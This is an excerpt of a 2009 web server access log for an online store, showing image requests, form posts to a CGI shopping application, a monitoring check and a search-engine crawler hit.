74.58.86.139 - - [07/May/2009:23:09:53 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1095954571803100F91C04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:53 -0400] "GET /images/next.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1095954571803100F91C04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
209.59.12.99 - - [07/May/2009:23:10:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.58.86.139 - - [07/May/2009:23:10:07 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1095954571803100F91C04G+M37+ENG HTTP/1.1" 200 48336 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:10:29 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1095954571803100F91C04G+M37+ENG HTTP/1.1" 200 59506 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:10:30 -0400] "GET /images/items/0032387_THUMB.JPG HTTP/1.1" 200 2343 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1095954571803100F91C04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
72.30.142.94 - - [07/May/2009:23:10:36 -0400] "GET /logs/error_log.Q109010400 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
